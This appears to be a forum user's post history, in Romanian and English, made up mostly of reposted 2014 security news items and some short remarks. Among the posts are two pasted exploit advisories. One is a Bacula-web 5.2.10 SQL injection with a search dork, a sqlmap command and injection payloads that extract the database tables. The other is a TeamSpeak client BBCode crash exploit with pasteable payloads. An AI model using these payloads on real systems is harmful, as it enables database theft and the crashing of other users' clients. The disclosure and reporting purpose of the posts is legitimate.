akkiliON

The tool, named "Safety Check," will soon be available globally to over 1.32 billion Facebook users on Android, iOS, feature phones and the desktops. The tool is designed to be activated after a natural disaster and by using either the city you lived in or your last location - if you have checked in on “Nearby Friends”, it let’s you alert your friends and family that you are safe, while also tracking the status of others. According to Facebook, this new move is in sake of 2011 earthquake and tsunami disaster took place in Japan when a deadly tsunami set off 30-foot tidal waves that crashed into the shores of Japan, flooding entire cities and damaging nuclear power plants, where Facebook emerged out to be an effective tool in connecting loved ones and notifying family members of their safety. In disaster situation, this tool offers you a simple but an effective way to notify your family and friends about your situation by just clicking on a simple I'm safe / I'm not option, which will push a notification and news feed story that is visible only to people on your friends list. Video link: Introducing Safety Check from Facebook on Vimeo If you have activated the tool, you will also receive a notification about friends who have marked themselves as safe too. You can also have a look on the demo video of Safety Check, which explains how the tool works. Surs?: Facebook “Safety Check” Allows You to Connect with Family during Natural Disasters

Tot astazi Google a lansat si un gadget despre care nu se stia nimic. Se numeste Nexus Player si este un set top box ce ruleaza Android TV. Acest gadget este produs de ASUS, ruleaza aplicatii pentru Android, suporta control vocal si are mai multe accesorii printre care as putea enumera un controller pentru gaming ce costa 40 de dolari sau o telecomanda. De asemenea este primul device ce ruleaza Android TV despre care s-a vorbit mult la I/O. Astfel ca vei putea urmari continut de pe Netflix, Hulu, Food Network, Travel Channel, etc. Pe partea hardware are un procesor Intel Atom quad core la 1.8 GHz, 1 GB de RAM, 8 GB de memorie interna, GPU Imagination PowerVR Seria 6 si este capabil sa ruleze aplicatii pe 64 bit. Se conecteaza la televizor prin HDMI si prin bluetooth la accesorii. Costa 100 de dolari si va fi disponibil din 3 noiembrie. Precomenzile incep din 17 octombrie. Surs?: Google a lansat Nexus Player | Arena IT

Da. Stai lini?tit c? am v?zut topic-ul.

Magazinele online din Romania au avut si inca au o sarcina grea: sa le castige increderea oamenilor, sa-i convinga de faptul ca online este mai simplu, mai rapid, mai sigur si mai ieftin, de multe ori. Odata castigata aceasta incredere apar si magazine care isi pot bate joc de ea, cum ar putea fi Fabrica de Discounturi. Este un magazin online aparut zilele astea, la fix pentru a strange clienti odata pentru cumparaturile de Craciun, si care ieri a avut reclama pe mai multe posturi de televiziune, inclusiv in timpul meciului de fotbal Finlanda – Romania. Dupa care site-ul a cazut, pentru ca au intrat atat de multi oameni incat WordPress-ul instalat si serverul lor nu a mai facut fata. De ce? Pentru ca ei profita de ultima parte mentionata de mine: mai ieftin. Dar nu asa, chiar si la jumatate de pret, iar unele produse nu sunt deloc vechi. Pentru ca, spun ei, le iau direct din fabrica. De aici si primul semn de intrebare. Daca tot nu credeti, dati un ochi peste promotiile de saptamana viitoare, unde gasim o tableta UTOK i700, in valoare de minim 250 RON, pe care ei o vor vinde la 70 RON. Oare tot de la usa fabricii o vor lua? Astept un raspuns de la UTOK pe tema asta si revin. Raspunsul a venit: UTOK nu are nicio legatura cu Fabrica de Discounturi, oferta e o teapa clara. Dupa care, daca citesti termenii si conditiile, termeni cu care esti de acord atunci cand cumperi, vei afla ca ei nu au nici o obligatie sa-ti mai dea banii inapoi daca renunti la comanda, comanda care va fi livrata in 3-4 saptamani, sau mai mult. Din nou, cum vor ei. Mai mult, se discuta deja pe forumuri si pe alte bloguri despre cum teapa e evidenta, pentru ca la registrul comertului e inregistrat cel mai probabil un israelian cu numar fals de telefon mobil iar la numarul de pe site oricum nu raspunde nimeni. Altfel, se pare ca au fost facute deja peste 14.000 de comenzi, ceea ce poate duce la o dauna de vreo cateva milioane de euro. Asta nu e tot, cel mai probabil nici reclama aia la TV nu o sa o plateasca nimeni si niste agentii de publicitate o vor lua peste nas. Si uite asa, oamenii care au cumparat de la Fabrica de Discounturi vor baga coada intre picioare si capul in pamant peste vreo luna, maxim doua, cand s-au resemnat. Partea proasta e ca o parte nu vor mai cumpara nici de la alte magazine online. Surs?: Fabrica de Discounturi: o teapa care strica increderea? | Arena IT

Ciudat, prima dat? când am accesat site-ul a func?ionat. Dup? un scurt timp: This webpage is not available

Internet users have faced a number of major privacy breaches in last two months. Major in the list are The Fappening, The Snappening and now the latest privacy breach in Dropbox security has gained everybody’s attention across the world. Dropbox, the popular online locker service, appears to have been hacked by an unnamed hacker group. It is still unclear how the account details of so many users were accessed and, indeed, if they are actually legitimate or not. However, the group claims to have accessed details from nearly 7 million individual accounts and are threatening to release users’ photos, videos and other files. HACKERS CLAIMED TO RELEASE 7 MILLION USERS’ PERSONAL DATA A thread surfaced on Reddit today that include links to files containing hundreds of usernames and passwords for Dropbox accounts in plain text. Also a series of posts with hundreds of alleged usernames and passwords for Dropbox accounts have been made to Pastebin, an anonymous information-sharing site. Hackers have already leaked about 400 accounts by posting login credentials, all starting with the letter B, and labelled it as a "first teaser...just to get things going". The perpetrators are also promising to release more more password details if they're paid a Bitcoin ransom. The security breach in Dropbox would definitely have bothered its millions of users and since passwords are involved in this incident, so it has more frightening consequences on its users. Reddit users have tested some of the leaked username and password combinations and confirmed that at least some of them work. DROPBOX DENIED THE HACK - THIRD PARTY IS RESPONSIBLE However, Dropbox has denied it has been hacked, saying the passwords were stolen apparently from third-party services that users allowed to access their accounts. In a statement to The Next Web, Dropbox said: The incident came just few days after the Snappening incident in which the personal images of as much as 100,000 Snapchat users were leaked online, which was the result of a security breach in the its third-party app. Snapchat has denied that its service or server was ever compromised, but the servers of a third-party app designed to save Snapchat photos, which became the target for hackers to obtain personal photographs. DROPBOX - "HOSTILE TO PRIVACY" SAYS SNOWDEN Dropbox was in the news earlier this week when, in a recent interview with The Guardian, NSA whistleblower Edward Snowden called Dropbox a "targeted, wannabe PRISM partner" that is "very hostile to privacy" — referring to its ability to access your data itself, which is yet another security consideration when it comes to web services. Snowden suggested web users to stop using Dropbox and warned them that the cloud storage service does not safeguard users’ privacy because it holds encryption keys and can therefore be forced by governments to hand over the personal data they store on its servers. He suggested people to use an alternative cloud storage provider that do not store any encryption keys, so that the users’ data cannot be read by anyone. USERS ARE ADVISED TO CHANGE PASSWORDS Until the full scope of the problem is known, it’s probably worthwhile changing your password. But whether the attack is confirmed or not, it’s a good idea to change your password just to be on a safer side — especially for those users who use same password for multiple services. Users are also recommended to turn on two-factor authentication, which Dropbox now supports and install a time-based, one-time password app on a mobile device. Update: Dropbox has issued a statement on its blog further clarifying that the Dropbox passwords were stolen from "unrelated services." "Attacks like these are one of the reasons why we strongly encourage users not to reuse passwords across services. For an added layer of security, we always recommend enabling 2 step verification on your account." Surs?: Nearly 7 Million Dropbox Account Passwords Allegedly Hacked

Te referi la vBulletin 5 *SQL Injection* ?

Payment services provider PayPal is vulnerable to an authentication restriction bypass vulnerability, which could allow an attacker to bypass a filter or restriction of the online-service to get unauthorized access to a blocked users’ PayPal account. The security vulnerability actually resides in the mobile API authentication procedure of the PayPal online-service, which doesn’t check for the blocked and restricted PayPal accounts. HOW THE VULNERABILITY WORKS n case if a PayPal user enters a wrong username or password combination several times in an effort to access the account, then for the security reasons, PayPal will restrict the user from opening or accessing his/her account on a computer until the answers to a number of security questions is provided. However, if the same user, at the same time switches to a mobile device and tries accessing the temporarily closed PayPal account with the right credentials via an official PayPal mobile app client through the API, the user will get access to the account without providing any additional security detail. WHAT WENT WRONG For some other security reasons, such as for preventing a fraudster from reaching illicitly obtained funds, PayPal could temporarily denied users to access their PayPal account. In such cases, a remote attacker could “login through the mobile API with PayPal portal restriction to access account information or interact with the compromised account.” REPORTED OVER ONE YEAR BUT STILL NO PATCH AVAILABLE The critical vulnerability in PayPal was discovered about a year ago by Benjamin Kunz Mejri from Vulnerability Laboratory, and as a responsible researcher, he reported the flaw to the PayPal’s team, but the fix for the vulnerability is still not available. Also no bug bounty has been paid to him for the discovery and responsible disclosure of the bug. According to the vulnerability disclosure document, the authentication restriction bypass vulnerability in PayPal online service has been assigned a high CVSS (Common Vulnerability Scoring System) base score of 6.2, but no identifier has been assigned to the bug. VIDEO DEMONSTRATION A video demonstration of the vulnerability has also been published by the researcher, showing how he intentionally enters the wrong username several times in order to have his PayPal account blocked. After account blocked, the online payment service requests him to answer some security question in order to validate the user. But, despite answering those questions, the researcher used his iOS device and entered the correct combination of username and password, which easily granted him access to his blocked account, allowing him to initiate financial transactions. PRODUCTS AFFECTED The vulnerability affects the iOS mobile application for both iPhone and iPad, as it fails to check for the restriction flags that would not allow access to the blocked or temporarily blocked account. According to the researcher, the version 4.6.0 of the iOS app is affected, and the flaw is also working on the latest version 5.8. An eBay owned company, PayPal provides a faster and safer way to pay and get paid. The service gives people simpler ways to send money without sharing financial information, with over 148 million active accounts in 26 currencies and across 193 markets, thereby processing more than 9 million payments daily. Surs?: Authentication Flaw in PayPal mobile API Allows Access to Blocked Accounts

Money is always a perfect motivation for cyber criminals who tries different tricks to solely target users with card skimmers that steal debit card numbers, but now the criminals are using specialized malware that targets ATM (Automated Teller Machine) systems to withdraw cash even without the need of a card. The new backdoor program, dubbed as “Tyupkin,” requires physical access to the ATM system running 32-bit Windows platforms and booting it off of a CD in order to install the malware. According to the researchers, the threat has continued to evolve in recent months, infecting ATMs in Asia, Europe, and Latin America. There are no details relating to the criminal gang behind the attacks, but they have already stolen "millions of dollars" from ATMs worldwide using the sophisticated malware, security firms Kaspersky and Interpol, who are working together in an attempt to foil the criminal gang, said in a joint statementreleased on Tuesday. HOW TYUPKIN ATTACK WORKS In order to install the malicious backdoor, money mules need to physically insert a bootable CD which installs the malware. Once the machine is rebooted, the ATM is under the control of the criminal gang. The sophisticated malware then runs in the background on an infinite loop awaiting a command from the attacker’s side. However, the malware will only accept commands at specific times – in this case on Sunday and Monday nights – making it harder to detect. Furthermore, a unique combination key based on random numbers is generated – so that the possibility of a member of the public accidentally entering a code can be avoided. This key code needs to be entered before the main menu is shown. When this session key is entered correctly, the ATM displays details of how much money is available in each cash cassette, inviting the operator to choose which cassette to steal from, and the number of available banknotes – the ATM dispenses a maximum of 40 at a time from the chosen cassette. COUNTRIES AFFECTED BY TYUPKIN During investigation the researchers found more than 50 ATMs from banking institutions throughout Eastern Europe, and most of the Tyupkin submissions came from Russia. The malware appears to have since spread to the United States, India, China, Israel, France and Malaysia. The scam has been even caught on video, as many of the ATMs have cameras, so you can also have a look to the video provided below. Kaspersky has informed law enforcement about the issue and also alerted banks and the financial sectors of the steps needed to prevent this type of attack. Surs?: Tyupkin Malware Hacking ATM Machines Worldwide

A newly discovered zombie network that exclusively targets Apple computers running Mac OS X across the globe has compromised roughly 17,000 machines so far, giving hackers backdoor access to infected computers, researchers at Russian antivirus firm Dr.Web warned. According to a survey of traffic conducted in September by researchers at Dr. Web, over 17,000 Macs globally are part of the Mac.BackDoor.iWorm botnet, which creates a backdoor on machines running OS X. Researchers say almost a quarter of iWorm botnet are located in the US. The most interesting thing to notice about this botnet is that it uses a special method of spreading via a search service of Reddit posts to a Minecraft server list subreddit to collect the IP addresses for its command and control (CnC) network. The user who had posted that subreddit data has now been shut down though the malware creators are likely to form another server list. Though the researchers did not mention how Mac.BackDoor.iWorm spreads, but they shared that the "dropper" program of the malware allows it to be installed in the Library directory within the affected user’s account home folder, disguised as an Application Support directory for "JavaW" and sets itself to autostart. Once a Mac has been infected, the software establishes a connection with the command and control server. The backdoor on the user's system can be used to receive instructions in order to perform a variety of tasks, from stealing sensitive information to receiving or spreading other malicious software. It could also change configuration or put a Mac to sleep. The Mac.BackDoor.iWorm is likely to send spam emails, flood websites with traffic, or mine bitcoins. Most of the compromised machines are located in the US, Canada ranked second, with 1,235 comprised addresses, followed by the United Kingdom with 1,227 addresses and the rest is in Europe, Australia, the Russian Federation, Brazil and Mexico. Surs?: Over 17000 Mac Machines Affected by 'iWorm' Botnet Malware

A critical zero-day vulnerability discovered in Mozilla’s popular Bugzilla bug-tracking software used by hundreds of prominent software organizations, both private and open-source, could expose sensitive information and vulnerabilities of the software projects to the hackers. The critical flaw allows an attacker to bypass email verification part when registering a new Bugzilla account, which clearly means that an attacker can register accounts using any email addresses of their choice without the need to access the actual inbox for validation purposes. VALIDATION BYPASS AND PRIVILEGE ESCALATION BUG Security firm Check Point Software Technologies disclosed the flaw (CVE-2014-1572) on Monday and said that it’s the first time when a privilege-escalation vulnerability has been found in the Bugzilla project since 2002. The Mozilla foundation has also confirmed that this particular bug exists in all versions of Bugzilla going back to version 2.23.3 from 2006. An analysis carried out by the researchers at Check Point revealed that the critical "bug enables unknown users to gain administrative privileges" as well as "by using these admin credentials, attackers can then view and edit private and undisclosed bug details." BUGZILLA AND ITS REACH Bugzilla is a Web-based general-purpose bugtracker and testing tool originally developed by the Mozilla Foundation, and has been used by a variety of organizations as a bug tracking system for free and open source software projects. Among others, the software is used by the Mozilla Foundation, Apache, the Linux kernel, OpenSSH, Eclipse, KDE, Wikimedia Foundation, Wireshark, Novell, and GNOME as well as, many Linux distributions. Nearly 150 large software developers and open-source projects use Mozilla’s Bugzilla software to track the vulnerabilities in their products. The actual figure could be even higher since many of the organisations are private. PATCH AVAILABLE Check Point reported the vulnerability to the Mozilla Foundation on September 29 and on Monday, Bugzilla rushed to release a patch for the issue to the public and warned the prominent organizations about its availability. New Bugzilla versions are offered for download: 4.0.15, 4.2.11, 4.4.6, and 4.5.6. “The overridden login name could be automatically added to groups based on the group's regular expression setting,” the advisory says. While Mozilla has already patched its own public Bugzilla server at bugzilla.mozilla.org, that installation was never configured to allow email-based privilege escalation. Surs?: Zero-Day in Bugzilla Exposes Zero-Day Vulnerabilities to Hackers

Week passed, and here comes the fourth wave of celebrity nude photos leak, revealing its first male victim. As part of the Fappening 4, 24-year-old Nick Hogan, the son of ex-wrestler Hulk Hogan has become the first male celebrity to fall victim to the leak of private and candid images. The first three ‘celebs nude photos leak’ usually have included the naked images of female celebrities such as Jennifer Lawrence, Ariana Grande, Scarlett Johansson, Kim Kardashian, Kate Upton, Selena Gomez, Cara Delevingne and others. But the latest celebrity photos leak include the private and intimate pictures of Nick Hogan. Among the victims of the most recent leak were actress Winona Ryder, 90210 star AnnaLynne McCord and Victoria's Secret model Erin Heatherton, singer Ingrid Michaelson, and a gaggle of foreign models and commercial actors whose nude selfies are reported to have been widely shared on social networks. According to multiple news outlets, this recent surge of celebrity nude photos were published on Thursday as the latest "Fappening" subreddit sprung up on Reddit. However, Reddit and 4Chan closed the forum titled Fappening and banned celebrity naked photo leak under threat of Digital Millennium Copyright Act (DMCA) takedown notices. According to multiple news outlets, this recent surge of celebrity nude photos were published on Thursday as the latest "Fappening" subreddit sprung up on Reddit. However, Reddit and 4Chan closed the forum titled Fappening and banned celebrity naked photo leak under threat of Digital Millennium Copyright Act (DMCA) takedown notices. The biggest victims seem to be The Vampire Diaries’ Nina Dobrev, whose 147 personal images (all fully-clothed) leaked online, as well as indie actress Zoe Kazan, whose 43 personal images leaked. The Fappening 4 comes just four days after a Hollywood lawyer Marty Singer – who represents more than a dozen targeted celebrities – issued Google with a threat to sue for $100 million if the images were not removed. In response to the legal action, Google made a move to delete “tens of thousands of pictures” and “closed hundreds of accounts” following Singer's request. But, it is yet to be known if Google will be removing the newly leaked celebs nude images. The lawyer’s letter claims they’ve sent Digital Millennium Copyright Act (DMCA) violation notices to Google multiple times over the past month to “remove the unlawful images,” but countless celebrities nude images nonetheless remain on Google-owned websites such as BlogSpot and YouTube. The nude photo scandal appears to be part of the massive leak that first began in August and has continued with three more Fappenings. The first nude celebrity photo leak victimized Jenny McCarthy, Rihanna, Kristin Dunst, Kate Upton, the American actress Mary E Winstead, and the Oscar winning actress Jennifer Lawrence. The second edition of the massive celeb nude photos leak related to the celebrities intimate-images including Kim Kardashian, Vanessa Hudgens and others were leaked online by an unknown hackers. The naked pictures were allegedly retrieved due to a “brute force” security flaw in Apple’s iCloud file storage service. However, Apple investigated the matter and confirmed there had been a "very targeted attack" on certain celebrities, rather than a widespread security breach affecting all users. The Fappening 3 released just two weeks ago that included 55 more nude photos of a three-time Oscar nominee Jennifer Lawrence hit the Internet once again, among American Olympic gold medallist Misty May Treanor and actors Alexandra Chando, Kelli Garner and Lauren O’Neil. The Fappening incident is currently under FBI investigation. There is also the possibility that the nude celebrity photos may have come from different sources. But whatever the source would be, this never ending massive privacy breach of high-profile celebrities once again questioned the security and privacy of users online data. Surs?: The Fappening 4 — More Celebrity Nude Photos Leaked Online

bacula-web 5.2.10 vulnerability Bacula-web is an web base application that provide you a summarized view all of the jobs bacula-director. title : Bacula-web 5.2.10 godork : "jobid=" bacula-web vulnerability : + Sql injection example : http://target.com/bacula-web/joblogs.php?jobid=99' PoC : @BlackCyber:/media/data/sqlmap$ python sqlmap.py -u "http://localhost/bacula-web-5.2.10/joblogs.php?jobid=20874" -D bacula --tables --dbms=mysql --level 3 --risk 3 --threads 5 --random-agent sqlmap/1.0-dev - automatic SQL injection and database takeover tool [url]http://sqlmap.org[/url] [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:25:45 [23:25:45] [INFO] fetched random HTTP User-Agent header from file '/media/data/sqlmap/txt/user-agents.txt': Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7 [23:25:46] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: jobid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: jobid=20874' RLIKE (SELECT (CASE WHEN (4767=4767) THEN 20874 ELSE 0x28 END)) AND 'aVuC'='aVuC Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: jobid=20874' AND (SELECT 8355 FROM(SELECT COUNT(*),CONCAT(0x7164667171,(SELECT (CASE WHEN (8355=8355) THEN 1 ELSE 0 END)),0x7162666371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dams'='dams Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: jobid=20874' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7164667171,0x7950756c6975654b5356,0x7162666371)# --- [23:25:47] [INFO] testing MySQL [23:25:48] [WARNING] reflective value(s) found and filtering out [23:25:48] [INFO] confirming MySQL [23:25:50] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6.0 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL >= 5.0.0 [23:25:50] [INFO] fetching tables for database: 'bacula' Database: bacula [24 tables] +----------------+ | BaseFiles | | CDImages | | Client | | Counters | | Device | | File | | FileSet | | Filename | | Job | | JobHisto | | JobMedia | | Location | | LocationLog | | Log | | Media | | MediaType | | PathHierarchy | | PathVisibility | | Pool | | Status | | Storage | | UnsavedFiles | | Path | | Version | +----------------+ Affected version : bacula-web 5.2.10 links vulnerable [url]http://www.bacula-web.org/download/articles/bacula-web-release-5210.html?file=files/bacula-web.org/downloads/bacula-web-5.2.10.tgz[/url] + Credits : all of pemancing ghalau.... /^wishnusakti

################################################################################################# # # Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability # Severity : High+/Critical # Reporter(s) : SpyEye & Christian Galeone # Software Version : 3.0.14 & Previous Versions # Software Name : TeamSpeak Client # Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe # Vendor Home : http://teamspeak.com/ # Date(s) : 01/04/2014 - 0r161n4l c0d3 By SpyEye # : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone # Tested in : Win7 - TeamSpeak Client V3.0.14 # CVE(s) : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone # ################################################################################################## # # Effects: # # Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel) # # Note: # # The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. # # PoC: # # 1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye # # CVE: CVE-2014-7221 # # [img=[img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28][/img] # # 2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone # # CVE: CVE-2014-7222 # # [img=[img]\\1\z][/img][img=[img]\\2\z][/img][img=[img]\\3\z][/img][img=[img]\\4\z][/img][img=[img]\\5\z][/img][img=[img]\\6\z][/img][img=[img]\\7\z][/img][img=[img]\\8\z][/img][img=[img]\\9\z][/img][img=[img]\\10\z][/img][img=[img]\\11\z][/img][img=[img]\\12\z][/img][img=[img]\\13\z][/img][img=[img]\\14\z][/img][img=[img]\\15\z][/img][img=[img]\\16\z][/img][img=[img]\\17\z][/img][img=[img]\\18\z][/img][img=[img]\\1\z][/img][img=[img]\\2\z][/img][img=[img]\\3\z][/img][img=[img]\\4\z][/img][img=[img]\\5\z][/img][img=[img]\\6\z][/img][img=[img]\\7\z][/img][img=[img]\\8\z][/img][img=[img]\\9\z][/img][img=[img]\\10\z][/img][img=[img]\\11\z][/img][img=[img]\\12\z][/img][img=[img]\\13\z][/img] # # Fix: # # http://screech.me/ts3/plugins/antifreeze.html # # OR # # http://www.teamspeak.com/?page=downloads # # Original Source: # # http://r4p3.net/public/ts3bbcodefreeze.txt # # http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/ # # Credit(s): # # SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r # # Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r # # ##################################################################################################

GNU Bourne-Again Shell (Bash) 'Shellshock' Vulnerability ! https://hackerone.com/reports/29839

The Federal Bureau of Investigation (FBI) has arrested the CEO of a UK-based company for allegedly advertising and selling a spyware app to individuals who suspect their romantic partners of cheating on them. The dodgy cell phone spyware application, dubbed as StealthGenie, monitors victims’ phone calls, text messages, videos, emails and other communications "without detection" when it is installed on a target's phone, according to the Department of Justice. The chief executive officer of a mobile spyware maker is a Pakistani man collared 31-year-old Hammad Akbar, of Lahore, who was arrested over the weekend in Los Angeles for flogging StealthGenie spyware application and now faces a number of federal charges. According to the US Department of Justice, Akbar operates a company called InvoCode, which sold the StealthGenie spyware app online that can intercept communications to and from mobile phones including Apple, Google, and BlackBerry devices. The company's business plan for the product focused on "the spousal cheat" market, which was expected to constitute 65 percent of the StealthGenie app purchasers, as the plan even spelled that out, stating that the target audience was cheating spouses and romantic partners. Once installed on the phone, it allows conversations to be monitored as they take place, enables the purchaser to call the phone and activate it at any time to monitor all surrounding conversations within a 15-foot radius, and collects the user’s incoming and outgoing email and SMS messages, incoming voicemail, address book, calendar, photographs, and videos. All of these functions are enabled without the knowledge of the user of the phone. StealthGenie spyware application, according to the law enforcement agency, is able to: Record all incoming/outgoing voice calls; Intercept calls on the phone to be monitored while they take place; Allow the attackers to call the phone and activate the app any time in order to monitor all surrounding conversations within a 15-foot radius; Monitor the user’s incoming and outgoing e-mail messages, SMS messages, incoming voicemail messages, address book additions, as well as Smartphones’ calendar, photographs, and videos. The federal prosecutors said this case is the first time that the US Department of Justice has prosecuted someone for advertising and selling mobile device spyware apps that targets adults. Akbar was charged with conspiracy, sale of a surreptitious interception device, advertisement of a known interception device and advertising a device as a surreptitious interception device in US District Court for the Eastern District of Virginia. Surs?: FBI Arrested CEO of 'StealthGenie' for Selling Mobile Spyware Apps

At the beginning of the month, Apple was criticized for the security flaw in its iCloud file storage service that, according to multiple media outlets, allowed hackers to allegedly retrieve nude photos of a number of high-profile celebrities. And Now, the company’s newly launched iOS 8 has been reportedly found vulnerable to another critical bug that is troubling Apple iOS 8 users. After the launch of iOS 8, some minor bugs was reported in its operating system which was quickly fixed in Apple’s iOS 8.0.1. But, the critical vulnerability discovered in iOS 8.0.1 seems to be deleting data stored in iCloud Drive without the user's permission. The bug was uncovered by MacRumors after its forum members complaint about the issue triggered by the option to "Reset All Settings", which is typically supposed to reset your network settings to give your iOS device a clean slate to work with, but it turns out the feature is also deleting all your files from iCloud Drive. Under the General category in Settings for iOS 8, the Reset All Settings option is supposed to simply reset your iOS settings while retaining your data and media, as the option explicitly says that "No data or media will be deleted." But unfortunately, that's not the case with the users who have the new iOS installed in their Apple devices, as certain iCloud documents also wiped out after users press the Reset All Settings button. User comments on the issue also suggest that the bug seems to be specific to documents from iWork apps, such as Pages, Keynote and Numbers, according to MacRumors. There have been multiple confirmed reports from users who lost all of their iWork documents after using the option, and the user who first noticed the issue has reported that only Apple’s productivity apps were impacted, but other data files remained in iCloud. These documents don’t just vanish from the iOS 8 device, either. They disappear from the web-based iCloud Drive manager as well as systems running OS X Yosemite. Only you can retrieve all your documents from there, if you have a backup for your files. But, if you don't have a backup, your documents are gone forever. Until the issue is addressed by Apple, users who have iCloud Drive enabled are advised to avoid using the "Reset All Settings" option on their devices, in order to protect their important documents stored in iCloud Drive from getting erased. Apple’s iCloud was also in recent controversies when the highly-publicized celebrity photos were leaked online due to Apple’s insufficient security measures on certain functions. Surs?: iOS 8 'Reset All Settings' Bug Could Delete Your iCloud Files

On one hand where more than half of the Internet is considering the Bash vulnerability to be severe, Apple says the vast majority of Mac computer users are not at risk from the recently discovered vulnerability in the Bash command-line interpreter – aka the "Shellshock" bug that could allow hackers to take over an operating system completely. Apple has issued a public statement in response to this issue, assuring its OS X users that most of them are safe from any potential attacks through the ShellShock Vulnerability, which security experts have warned affect operating systems, including Mac's OS X. According to Apple, in OS X majority of users are considered to be safe so long as they haven’t configured any advanced access. Soon the company will also issue an OS X update to fix the potential hole, till then the OS X users are advised to make sure that they don’t enable any advanced UNIX options before the patch releases. The critical vulnerability in the widely used Linux and Unix command-line shell, known as Bash or the GNU Bourne Again Shell, affects versions 1.14 through 4.3 of GNU Bash and is based on how Bash handles environment variables. By creating a function as part of the variable, it's possible to execute commands when the variable is evaluated. The exploit reportedly affects most Linux- and Unix-based operating systems around the world, including OS X. Researchers on Thursday also discovered that the ShellShock vulnerability has been exploited by the cyber criminals in the wild to take over Web servers as part of a botnet attack that is currently trying to infect other servers as well. The Bash glitch has been described as more worse than the Heartbleed security flaw, discovered in April, that left all the information stored on data servers potentially vulnerable to hackers. Over 300,000 servers were still vulnerable to the most critical OpenSSL bug two months after the bug was first identified. Users are advised to do not panic and avoid using advance services that can be exploited by the ShellShock vulnerability for quite sometime before the official patch for the issue is not released. Till then, you may patch yourself using an unofficial patch that fixes the problem and claimed to completely addresses both vulnerabilities. In an email to the Open Source Software Security (oss-sec) mailing list, the maintainer of Bash, Chet Ramey addressed the vulnerability and issued the patch, but there is as of yet no official fix for the issue.

Users might have praised the technology companies for efforts to encrypt their latest devices that would prevent law enforcement agencies’ hands on users’ private data, but the FBI is not at all happy with Apple and Google right now. The Federal Bureau of Investigation director, James Comey, said Thursday he was "very concerned" over Apple and Google using stronger or full encryption in their Smartphones and Tablets that makes it impossible for law enforcement to collar criminals. According to Comey, the Silicon Valley tech giants are "marketing something expressly to allow people to place themselves above the law." Comey told reporters. The move is in the response to the revelations of mass surveillance conducted by the US National Security Agency (NSA), revealed by former contractor Edward Snowden, that triggered a large-scale movement worldwide towards deploying encryption across all the Digital Services. The FBI remarks come following both privacy changes introduced by Apple as well as Google. Just last week, Google announced it would be providing data encryption by default with its next version of Android i.e. Android L. While Apple with the release of iOS 8 earlier this month, allowed iPhone and iPad users to encrypt most personal data with a password. Also last week, the company introduced enhanced encryption for iOS 8 devices under which it will no longer store the encryption keys for devices in iOS 8, making it impossible for the company to decrypt a locked device, even on law enforcement request. Google’s announcement for by default encryption comes a day after Apple revealed that it is expanding its two-factor authentication process to include the iCloud storage system, which was recently targeted by hackers to extract over 100 nude celebrities photos. Comey said he agreed-upon the privacy concerns in the wake of NSA leaker Edward Snowden's revelations about massive US government surveillance. But he also noted that the FBI sometimes has an urgent need to access users’ data, such as in cases of terrorism or kidnappings. Despite criticism from the FBI, it's improbable that Apple or Google is going to step back from their efforts, because the technology companies again will not compromise with their reputation in the market where many are criticised in past to put backdoors in their products for law enforcement agencies. Surs?: http://thehackernews.com/2014/09/FBI-iPhone-android-full-encryption.html

Dude, it's phone. De banii aia, î?i cumperi de dou? ori acest telefon.

)))

Vulnerability: XSS Reflected URL Link: https://academy-rm.cc.corp.yahoo.com *Nu mai func?ioneaz?.* Author: akkiliON Status: Fixed Bonus: + https://academy-rm.cc.corp.yahoo.net *Înc? func?ioneaz? site-ul, dar a fost reparat? vulnerabilitatea ?i aici.* No reward: A?a ar?ta link-ul: https://academy-rm.cc.corp.yahoo.net/pe/action/profile/resetpasswordsave?email=&returnUrl=[vector] Poz?:

Nu sunt prost, fac pe prostu'.

[table=width: 500, class: grid, align: left] [tr] [td]Vulnerability:[/td] [td]XSS - Reflected/Persistent/DOM Based[/td] [/tr] [tr] [td]Author:[/td] [td]akkiliON[/td] [/tr] [tr] [td]Status:[/td] [td] Fixed[/td] [/tr] [tr] [td]Date:[/td] [td]08.28.2014[/td] [/tr] [tr] [td]Proof:[/td] [td]XSS - Reflected AT&T <bugbounty.att.com>[/td] [/tr] [/table] S? vedem ce spun mai departe.